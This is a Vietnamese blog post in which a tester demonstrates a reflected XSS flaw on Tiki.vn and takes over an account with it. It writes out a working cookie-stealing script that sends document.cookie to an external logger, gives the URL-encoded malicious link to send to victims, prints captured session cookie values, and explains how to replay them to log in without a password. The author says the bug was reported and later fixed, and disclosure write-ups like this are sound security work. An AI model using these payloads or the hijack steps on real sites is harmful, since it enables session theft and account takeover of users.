Chào các bạn,
Hôm nay mình sẽ demo về một lỗ hổng đang có trên trang Tiki.vn có thể cho phép hacker chiếm lấy tài khoản người dùng thông qua lỗi XSS. Hôm trước mình có lên web Tiki để xem sản phẩm, là tester nên cũng có chút bệnh nghề nghiệp nên sẵn tiện mình kiểm tra sơ qua xem trang web có lỗi gì không, kết quả là phát hiện ra một lỗi khá thú vị về XSS này.
Tất cả những bước demo bên dưới mình đều làm trên một tài khoản do mình tạo ra và không lấy tài khoản của người dùng khác. Mình sẽ không chịu bất kỳ trách nhiệm nào nếu bạn dùng bài demo này vào mục đích xấu.
Các bước thực hiện:
1. Kiểm tra lỗi XSS trên trang web.
– Đầu tiên mình sẽ vào trang Tiki.vn và tìm đến một sản phẩm nào đó trên web để kiểm tra.
– Đây là link của sản phẩm:
|
1 |
http://tiki.vn/o-cung-di-dong-silicon-power-armor-a30-1tb-p99653.html?src=home_top1_phukien&ref=c1815.c1817.c1827.c2055.c2056.c2769.c2808.c2811.c2852.c2854.c2952.c3477.c3646.c4174.c4657.c4799.c2448.c2877.c3025.c3110.c3436.c3847. |
– Để check lỗi XSS mình sẽ thêm lệnh: < script >alert(‘checking’)< /script > vào phía sau ?src= và chạy trên trình duyệt. Nếu có hiện popup với nội dung là “checking” thì trang web dính lỗi XSS. Đầy đủ URL kiểm tra sẽ như sau:
|
1 |
http://tiki.vn/o-cung-di-dong-silicon-power-armor-a30-1tb-p99653.html?src=<script>alert('checking')</script> |
Có hiện thông báo, vậy là web có lỗi rồi, chúng ta qua bước tiếp theo.
2. Chèn mã đánh cắp cookies.
Hacker họ sẽ chèn một đoạn mã để lấy cookies thay vì chỉ hiện một popup với nội dung checking như bước 1, code đó sẽ có dạng như sau:
|
1 |
<script>document.location="http://localhost/xss/ckies.php?ex="+document.cookie;</script> |
File ckies.php là file để đánh cắp cookies, nó sẽ lưu tất cả thông tin về cookies người dùng vào một file .txt được định sẵn, từ đó hacker có thể xem và đánh cắp thông tin. Để sử dụng code này cũng làm tương tự là chèn nó phía sau ?src=.
|
1 |
http://tiki.vn/o-cung-di-dong-silicon-power-armor-a30-1tb-p99653.html?src=<script>document.location="http://localhost/xss/ckies.php?ex="+document.cookie;</script> |
Nhưng nếu dán đoạn này lên trình duyệt nó sẽ không chạy được. Lúc này hacker sẽ làm thêm một bước là chuyển mã dòng <script> để nó có thể thực thi được trên trình duyệt. Chúng ta qua bước tiếp theo để xem họ sẽ làm như thế nào nhé.
3. Encode URL và gởi cho victim.
– Để encode sang dạng url có thể dùng trang http://asciitohex.com
– Code gốc trước khi chuyển:
|
1 |
<script>document.location="http://localhost/xss/ckies.php?ex="+document.cookie;</script> |
– Code sau khi đã encoded:
|
1 |
%3Cscript%3Edocument.location%3D%22http%3A%2F%2Flocalhost%2Fxss%2Fckies.php%3Fex%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E |
– Full URL: Vậy là đã chuyển mã xong, tiếp theo hacker sẽ nối link web và đoạn mã này lại thành một đường dẫn đầy đủ có dạng như sau:
|
1 |
http://tiki.vn/o-cung-di-dong-silicon-power-armor-a30-1tb-p99653.html?src=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Flocalhost%2Fxss%2Fckies.php%3Fex%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E |
Vậy là họ đã có 1 link để đánh cắp cookies với domain là Tiki.vn.
Họ sẽ gởi link này đến người cần lấy tài khoản, nếu người dùng đang đăng nhập và click vào thì sẽ bị mất cookies. Nguy hiểm của lỗi này là khi nhìn vào URL bên trên, người dùng sẽ không nghĩ là có mã độc vì domain chính vẫn đang là của Tiki.vn.
Bây giờ mình sẽ làm nạn nhân bằng cách đăng nhập vào tài khoản và tự nhập vào link trên để cookies bị ghi lại trong file log.txt của hacker.
Sau khi mình vào link trên thì nó tự đồng chuyển về trang chủ, mình hoàn toàn không biết rằng cookies đã bị ghi lại. Vậy chúng ta sẽ đi tiếp để xem hacker họ làm gì với thông tin đã lấy được nhé.
4. Kiểm tra file log và sửa cookies.
– Hacker sẽ kiểm tra file Logfile.txt, Đây là các thông tin cookies của mình vừa bị ghi lại.
|
1 |
TKSESSID=ukv588j8jg7sumlhct06n93oi0; _ga=GA1.2.1413539812.1449923302; _pk_id.3.2fc5=23ad96e2f70121bb.1449923302.4.1451156927.1451146701.; amplitude_idtiki.vn=eyJkZXZpY2VJZCI6IjVhYmQzOWNjLTY2MTEtNDQzNS1iY2ZiLTI4ZjljYTg0MWYxNyIsInVzZXJJZCI6bnVsbCwib3B0T3V0IjpmYWxzZX0=; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id="d968e10a-567b-43a5-a381-fd72a9d815bb"; gr_reco=1519629f63c-6fab32be4c609d6f; __atuvc=3|51; __zlcmid=YGfBmnXCH49lmC; _pk_ses.3.2fc5=*; StrandsSBS_Sess=SESS_503870531962724_1451146703556; StrandsSBS_User=1074215; strandsSBS_S_UserId=SBS_543456386970699_1449923306541; gr_rt=1519629f63c-6fab32be4c609d6f; strandsSBS_P_UserId=1074215; _gat_UA-15036050-10=1; TIKI_24H=RsIPGShKaqrXm38zRrh2H+TaHjryejbHZGzSzogKmCwajs/XZM03VFLjz7W7hg99uXfbMjti31EuSRf5XrEzXw==; ants_ad_ss=0e07fb96d5e5b78b0204012781c2b9e35cc3c5a9; TIKI_USER=vkVjFv2fBuN2unnL4t1MrpaSN3asXFhyadw8oHjPzaga/lzpuSwx1HUzsPCErnmQJjX/ZBq2+bFy9Kw35py3DE63Am3E6s4KCmUR84FyjTaLuXY3iIh6Ypf7kfVgh3rW; _gat=1 |
– Cách hacker lấy tài khoản là họ sẽ dùng thông tin cookies của bạn và sử dụng một addons trên trình duyệt để add thông tin đó vào, lúc đó trình duyệt sẽ nghĩ là bạn đang đăng nhập. Có khá nhiều chương trình chỉnh sửa cookies ví dụ: Cookies Manager+ hoặc EditThisCookie.
5. Đăng nhập thông qua cookies.
– Hacker sẽ đăng nhập thông qua thông tin trong file log và không cần biết username, password của bạn. Mình sẽ dùng một trình duyệt khác (chưa login) để demo việc này.
(Thay thế TKSESSID hiện có)
(Đăng nhập thành công)
Vậy là đã đăng nhập thành công bằng cookies (đánh cắp) mà không cần nhập user, password. Video các bước thực hiện:
Nếu có thắc mắc hay muốn trao đổi thêm về lỗi XSS các bạn có thể liên hệ mình theo thông tin liên hệ trên blog. Cảm ơn các bạn đã xem.
—–
Update: Tiki.vn đã fix lỗi này sau khi nhận được thông báo.
Pingback: [Sercurity – XSS] – Cross Site Scripting at Tiki.vn – Automated Software Testing